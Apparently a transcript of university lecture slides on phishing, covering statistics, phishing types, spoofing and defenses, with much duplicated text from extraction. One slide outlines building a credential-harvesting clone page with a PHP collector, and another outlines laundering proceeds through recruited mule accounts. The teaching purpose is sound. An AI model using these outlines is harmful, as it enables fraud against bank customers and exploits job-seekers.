Phishing Attacks
description
Transcript of Phishing Attacks
Phishing AttacksPhishing AttacksDr. Neminath HubballiDr. Neminath Hubballi
OutlineOutline Motivation Motivation IntroductionIntroduction Forms and means of Phishing AttacksForms and means of Phishing Attacks Phishing today Phishing today Staying safeStaying safe
Server side defenseServer side defense Personal level defensePersonal level defense Enterprise level defenseEnterprise level defense
Distributed phishing Distributed phishing Indian Institute of Technology IndoreIndian Institute of Technology Indore
Motivation: Phishing Attacks in Motivation: Phishing Attacks in India and Globally India and Globally
India lost India lost around $53 million (about Rs 328 crore) due to phishing scams with the country facing over 3,750 attacks in July-September last year
4th Largest target of phishing attacks in the world 7% of global phishing attacks are targeted in India US tops the rank with 27% of phishing attacks RSA identified 46,119 phishing attacks in September
globally with a 36 per cent increase as compared with August (33,861)
Indian Institute of Technology IndoreIndian Institute of Technology Indore
Courtesy: The Hindu Business http://www.thehindubusinessline.com/industry-and-economy/info-tech/india-lost-53-m-to-phishing-attacks-in-q3/article5414170.ece
Phishing AttacksPhishing Attacks It is made-up of It is made-up of
Phreaking + Fishing = PhishingPhreaking + Fishing = Phishing Phreaking = making phone calls for free back in 70’sPhreaking = making phone calls for free back in 70’s Fishing = Attract the fish to bite Fishing = Attract the fish to bite
Indian Institute of Technology IndoreIndian Institute of Technology Indore
There are lot of fishes in pondThere are lot of fishes in pondLure them to come and bite Lure them to come and bite Those who bite become victims Those who bite become victims
Courtesy: Google Images
Phishing AttacksPhishing Attacks Phishing is a form of social engineering attackPhishing is a form of social engineering attack
Not all social engineering attacks are phishing attacks !Not all social engineering attacks are phishing attacks ! Mimic the communication and appearance of another Mimic the communication and appearance of another
legitimate communications and companieslegitimate communications and companies The first fishing incident appeared in 1995The first fishing incident appeared in 1995 Attractive targets includeAttractive targets include
Financial institutionsFinancial institutions Gaming industry Gaming industry Social media Social media Security companiesSecurity companies
Indian Institute of Technology IndoreIndian Institute of Technology Indore
Phishing Information FlowPhishing Information Flow Three componentsThree components
Mail sender: sends Mail sender: sends large volume of large volume of fraudulent emailsfraudulent emails
Collector: collect Collector: collect sensitive sensitive information from information from usersusers
Casher: use the Casher: use the collected sensitive collected sensitive information to en-information to en-cashcash
Indian Institute of Technology IndoreIndian Institute of Technology Indore
Courtesy: Junxiao Shi and Sara Saleem
Phishing FormsPhishing Forms Creating Fake URLs and send itCreating Fake URLs and send it Misspelled URLsMisspelled URLs
www.sbibank.statebank.comwww.sbibank.statebank.com www.miwww.miccosoft.com osoft.com www.miwww.mircrcosoft.com osoft.com
Creating anchor textCreating anchor text <a href = "anchor text" > Link Text </a> Link Text
Fake SSL lockFake SSL lock Simply show it so that users feel secureSimply show it so that users feel secure
Getting valid certificates to illegal sitesGetting valid certificates to illegal sites Certifying agency not being alertCertifying agency not being alert
Sometimes users overlook security certificate warningsSometimes users overlook security certificate warnings URL Manipulation using JavaScriptURL Manipulation using JavaScript
Indian Institute of Technology IndoreIndian Institute of Technology Indore
Phishing PayloadPhishing Payload
Indian Institute of Technology IndoreIndian Institute of Technology Indore
Phishing PurposePhishing Purpose
Indian Institute of Technology IndoreIndian Institute of Technology Indore
Types of PhishingTypes of Phishing Clone Phishing: Clone Phishing:
Phisher creates a clone email Phisher creates a clone email Does by getting contents and addresses of recipients and senderDoes by getting contents and addresses of recipients and sender
Spear Phishing:Spear Phishing: Targeting a specific group of usersTargeting a specific group of users All users of that group have something in common All users of that group have something in common
Targeting all faculty members of IITITargeting all faculty members of IITI
Phone Phishing:Phone Phishing: Call up someone and say you are from bank Call up someone and say you are from bank Ask for password saying you need to do maintenanceAsk for password saying you need to do maintenance Use of VOIP is easy Use of VOIP is easy
Indian Institute of Technology IndoreIndian Institute of Technology Indore
Email Spoofing for Phishing An email concealing its true source Ex. [email protected] when it is actually
coming from somewhere else Send an email saying your bank account needs
to be verified urgently When the user believes
Sends her credit card Gives her password
Sending spoofed email is very easy There are so many spoof mail generators
Sample Email
Web Spoofing for Phishing Setting up a webpage which looks similar to the original
one Save any webpage as html page
Go to view source and save A php script which stores credentials to a file is what
required to harvest credentials In the html page search for submit form and change it to
written php script Host it in a server You are ready to go ! Send a spoofed email with link to spoofed webpage
Phishing TodayPhishing Today Use bots to perform large scale activity Use bots to perform large scale activity
Relays for sending spam and phishing emailsRelays for sending spam and phishing emails Phishing KitsPhishing Kits
Ready to useReady to use Contain clones of many banks and other websitesContain clones of many banks and other websites
Emails Emails JPEG images-Complete email is an image JPEG images-Complete email is an image Suspicious parts of URL may have same color as backgroundSuspicious parts of URL may have same color as background Use font differencesUse font differences
The substitution of uppercase “i” for lowercase “L”, andThe substitution of uppercase “i” for lowercase “L”, and Number zero for uppercase “O”.Number zero for uppercase “O”.
Use of first 4 digits of credit card number – which is not unique to Use of first 4 digits of credit card number – which is not unique to customercustomer
Indian Institute of Technology IndoreIndian Institute of Technology Indore
Phishing Today
Uncommon encoding mechanismsUncommon encoding mechanisms
Cross site scriptingCross site scripting Accept user input and lack of sanity checkAccept user input and lack of sanity check Vulnerable Vulnerable
Fake banner advertisementsFake banner advertisements
Phishing Today Dynamic code
Phishing emails contain links to sites whose contents change When email came in midnight it was ok but next day when you
clicked its vulnerable Numbers (IP address ) in urls Use of targeted email
Gather enough information about user from social networking sites
Send a targeted email using the knowledge of previous step Unsuspecting user clicks on link Attacker takes control of recipient machine (backdoor, trojan) Steal / harvest credentials
Enterprise Level ProtectionEnterprise Level Protection Collecting data from usersCollecting data from users
About emails receivedAbout emails received Websites linksWebsites links Why any one should give you such dataWhy any one should give you such data
Her interest also included Her interest also included Incentives Incentives
Analyzing spam emails for keywords Analyzing spam emails for keywords ““click on the link bellow”click on the link bellow” ““enter user name password here”enter user name password here” ““account will be deleted” etc.account will be deleted” etc.
Personalization of emailsPersonalization of emails Every email should quote some secrete that proves the idntity Every email should quote some secrete that proves the idntity Ex: Phrase as Dear Dr. Neminath Instead of Dear Customer Ex: Phrase as Dear Dr. Neminath Instead of Dear Customer Referring to timing of previous emailReferring to timing of previous email
Indian Institute of Technology IndoreIndian Institute of Technology Indore
What Banks are Doing to What Banks are Doing to Protect from PhishingProtect from Phishing
Banks and their customers lose crores of rupees every Banks and their customers lose crores of rupees every yearyear
They hire professional security agencies who constantly They hire professional security agencies who constantly monitor the web for phishing sitesmonitor the web for phishing sites
Regularly alert the users “Regularly alert the users “to be alertto be alert” and not to fall fray ” and not to fall fray Use best state of the art security software and hardwareUse best state of the art security software and hardware White list and blacklist of phishing sitesWhite list and blacklist of phishing sites
Indian Institute of Technology IndoreIndian Institute of Technology Indore
Personal Level ProtectionPersonal Level Protection Email ProtectionEmail Protection
Blocking dangerous email attachments Blocking dangerous email attachments Disable HTML capability in all emailsDisable HTML capability in all emails
Awareness and education Awareness and education Web browser toolbarsWeb browser toolbars
Connect to a database of FQDN IP address mapping of Phishing siteConnect to a database of FQDN IP address mapping of Phishing site I think Google chrome does it automatically I think Google chrome does it automatically
Multifactor authentication Multifactor authentication Gmail has it nowGmail has it now
Indian Institute of Technology IndoreIndian Institute of Technology Indore
Case Study 1: Phone Phishing Experiment Case Study 1: Phone Phishing Experiment
50 employees were contacted by 50 employees were contacted by female female crookscrooks Had friendly conversation Had friendly conversation Managed to get e-banking passwordsManaged to get e-banking passwords
Do not believe the statistics but believe the takeaway !Do not believe the statistics but believe the takeaway !
Indian Institute of Technology IndoreIndian Institute of Technology IndoreSource: Experimental Case Studies for Investigating E-Banking Phishing Intelligent Techniques and Attack Strategies
Money LaunderingMoney Laundering Phishing allows you to make moneyPhishing allows you to make money
Many banks do not allow money transfer to foreign banks just Many banks do not allow money transfer to foreign banks just like thatlike that
But how to stay undetected But how to stay undetected Launder money Launder money
How to launder moneyHow to launder money Offer jobs to needy people Offer jobs to needy people Ask them to open accounts in the same bankAsk them to open accounts in the same bank Put money into their accountPut money into their account Ask them to take small commission and transfer the rest to their Ask them to take small commission and transfer the rest to their
account in nigeria account in nigeria
Indian Institute of Technology IndoreIndian Institute of Technology Indore
Distributed Phishing Attack Till now we understood there is one collection center for
data What if attacker raises multiple such sites and collect
data An extreme example is - every user is redirected to a different
site An attacker can look for more cheaper options for
collecting such data Use malware to erect more such sites hidden in
someone else webpage Users with reliable connectivity and have popular
software like games are targets